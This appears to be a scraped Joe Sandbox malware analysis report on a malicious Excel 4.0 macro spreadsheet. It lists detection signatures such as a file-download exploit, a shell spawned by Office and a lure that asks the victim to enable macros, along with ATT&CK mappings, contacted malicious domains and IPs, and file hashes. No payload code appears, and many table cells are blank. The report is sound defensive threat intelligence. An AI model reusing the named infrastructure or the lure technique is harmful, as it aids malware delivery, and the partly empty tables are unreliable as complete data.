Play interactive tourEdit tour
Analysis Report Complaint-1992179913-02182021.xls
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
| |
JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Compliance: |
---|
Uses new MSVCR Dlls | Show sources |
Source: | File opened: | Jump to behavior |
Uses secure TLS version for HTTPS connections | Show sources |
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: | Jump to behavior |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Yara detected hidden Macro 4.0 in Excel | Show sources |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol13 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer1 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
rzminc.com | 72.52.227.180 | true | false |
| unknown |
crt.sectigo.com | 91.199.212.52 | true | false |
| unknown |
jugueterialatorre.com.ar | 138.36.237.100 | true | false | unknown | |
pathinanchilearthmovers.com | 162.241.80.6 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
true |
| unknown | |
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.241.80.6 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | false | |
138.36.237.100 | unknown | Argentina | 27823 | DattateccomAR | false | |
91.199.212.52 | unknown | United Kingdom | 48447 | SECTIGOGB | false | |
72.52.227.180 | unknown | United States | 32244 | LIQUIDWEBUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 356738 |
Start date: | 23.02.2021 |
Start time: | 15:56:39 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 50s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Complaint-1992179913-02182021.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 32 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal84.expl.evad.winXLS@11/8@4/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
162.241.80.6 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
138.36.237.100 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
91.199.212.52 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
crt.sectigo.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
rzminc.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
jugueterialatorre.com.ar | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
pathinanchilearthmovers.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
DattateccomAR | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
SECTIGOGB | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1559 |
Entropy (8bit): | 7.399832861783252 |
Encrypted: | false |
SSDEEP: | 48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep |
MD5: | ADAB5C4DF031FB9299F71ADA7E18F613 |
SHA1: | 33E4E80807204C2B6182A3A14B591ACD25B5F0DB |
SHA-256: | 7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676 |
SHA-512: | 983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 3.1079460455882972 |
Encrypted: | false |
SSDEEP: | 3:kkFklrGmaE/XfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ15z:kKVTkqjXxp9jKFlIaYM2+/LOjA/ |
MD5: | 5C0062E1FDB7DD1FA8E52F75B646DB76 |
SHA1: | FD494729C69970219FF8E770389F06C234DF0B80 |
SHA-256: | 9BA8C1B92E4FA8A1AD67B0742654642F1B375E3AB1A6ECF94E3C62C5B2AAF385 |
SHA-512: | 54CCB267EB033615F38F04CAEA9547117F3EA6CF6A7269053599EB9294ADF142D1B43E36E7A534C50F1A3264973712BD5A2585F81C2CEED366BA6F24B6D02B12 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 132891 |
Entropy (8bit): | 5.375885170203908 |
Encrypted: | false |
SSDEEP: | 1536:9cQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:ZcQ9DQW+z0XiK |
MD5: | 45B476C199428226B8C8D806849E0314 |
SHA1: | 0328182400FD1C6524C344C653F87B862E5C2B88 |
SHA-256: | 27A61C896C19DD04F94D375E4F7E4C65D0E9926668EEC6F4151972E0EDC8B2EF |
SHA-512: | 6009F199524974C95991E99FAF8A4C344CE9ADB60AC06EB2E39C0E09DDA9B1FF829C114630D226BD26163557644B56D85949E9BDF9D2222EFB124C03A098EA51 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 31496 |
Entropy (8bit): | 7.6412973417306045 |
Encrypted: | false |
SSDEEP: | 384:A2EQtJPWEt4wFVfViKzV8aoVT0QNuzWKPqSFpBHRb7y3Tud3KyGqjNHWqK:E2hViKiW+u7qS7BHRbu3TukcRTK |
MD5: | 97AEF11CCFBF9743A5D7C8DCDC32BDBC |
SHA1: | B2A73BBA538D4B8A9E3B9149BE140CA0078FFD6F |
SHA-256: | DAEC2DDEA16AA1520E481F8B0DE9CEC060E257C0AC96B3D34187DF65DBF4B0A8 |
SHA-512: | A822C5919341CCF2A31FABCE1AC10AF6B8A675D24F7CCCD06E932629E0C89013B2B595E978644F4DED5CC8A564AB4BF122F181E5968E6CFFA3D1585AFA99215E |
Malicious: | false |
